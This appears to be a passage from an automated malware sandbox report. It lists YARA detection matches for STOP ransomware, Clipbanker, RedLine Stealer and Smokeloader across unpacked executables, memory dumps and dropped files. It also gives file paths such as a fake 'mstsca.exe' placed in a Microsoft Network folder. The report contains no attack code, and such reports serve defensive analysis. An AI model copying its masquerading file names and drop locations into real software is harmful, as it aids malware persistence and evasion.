Source: 35.0.build3.exe.20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 35.0.build3.exe.20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 21.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 21.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 41.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 41.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 27.2.86ED.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.86ED.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 20.2.AF5C.exe.27415a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 20.2.AF5C.exe.27415a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.86ED.exe.27015a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.86ED.exe.27015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.9B15.exe.26615a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.9B15.exe.26615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.AF5C.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.AF5C.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 30.2.759F.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 30.2.759F.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.759F.exe.22f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.759F.exe.22f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.759F.exe.22515a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.759F.exe.22515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.759F.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.86ED.exe.27015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.86ED.exe.27015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 32.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 32.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 35.2.build3.exe.20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 35.2.build3.exe.20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 39.0.mstsca.exe.1360000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 39.0.mstsca.exe.1360000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 14.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.759F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 20.2.AF5C.exe.27415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 20.2.AF5C.exe.27415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.2.E8B1.exe.28f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.2.E8B1.exe.28f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.2.E8B1.exe.28f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.2.E8B1.exe.28f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 21.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 21.2.6C74.exe.23315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 31.2.6000.exe.22815a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 31.2.6000.exe.22815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 33.2.6000.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 33.2.6000.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 30.2.759F.exe.22d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 30.2.759F.exe.22d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 26.2.9B15.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 26.2.9B15.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 29.2.E8B1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 29.2.E8B1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.6C74.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 26.2.9B15.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 26.2.9B15.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.759F.exe.22515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.759F.exe.22515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.6C74.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.759F.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.759F.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 32.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 32.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.759F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 31.2.6000.exe.22815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 31.2.6000.exe.22815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.6C74.exe.23315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 27.2.86ED.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.86ED.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.AF5C.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.AF5C.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 29.2.E8B1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 29.2.E8B1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 33.2.6000.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 33.2.6000.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.9B15.exe.26615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.9B15.exe.26615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 41.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 41.2.759F.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 40.0.D5B9.exe.b30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects downloader / injector Author: ditekSHen
Source: 00000000.00000002.379855236.0000000002161000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000016.00000002.463476462.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.379710237.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.476313714.0000000002730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000022.00000002.488406614.0000000001BF1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.450171034.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000A.00000002.448327047.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000029.00000002.497413015.0000000002200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.475648419.0000000000650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.452052947.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.475973961.0000000000691000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000013.00000002.475785512.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000027.00000002.618588057.0000000001361000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000027.00000002.618588057.0000000001361000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.450322842.0000000002021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.449916655.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000023.00000002.485749364.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000023.00000002.485749364.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000019.00000002.466055067.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.379758047.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000015.00000002.461592637.0000000002290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000023.00000000.481088254.0000000000021000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000023.00000000.481088254.0000000000021000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000013.00000002.475372910.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000027.00000000.484270082.0000000001361000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000027.00000000.484270082.0000000001361000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001F.00000002.480287492.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.499761929.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.449569254.0000000000650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.440951446.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000014.00000002.460148088.00000000026A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.379724310.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000023.00000002.484895697.0000000000021000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000023.00000002.484895697.0000000000021000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001E.00000002.476748443.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 759F.exe PID: 7636, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 759F.exe PID: 7656, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 759F.exe PID: 7744, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 6C74.exe PID: 7764, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 6C74.exe PID: 7824, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 759F.exe PID: 7864, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 759F.exe PID: 7972, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 759F.exe PID: 7992, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: AF5C.exe PID: 8152, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 6C74.exe PID: 8172, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 9B15.exe PID: 5172, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: AF5C.exe PID: 7180, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 6C74.exe PID: 3676, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 86ED.exe PID: 2300, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 9B15.exe PID: 3312, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 86ED.exe PID: 1476, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E8B1.exe PID: 7184, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E8B1.exe PID: 7356, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 759F.exe PID: 7412, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 6000.exe PID: 7420, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 759F.exe PID: 7448, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe, type: DROPPED	Matched rule: Detects downloader / injector Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\F86F.exe, type: DROPPED	Matched rule: Detects downloader / injector Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B624	0_2_0040B624
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_0040B624	4_2_0040B624
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: 5_2_00417046	5_2_00417046
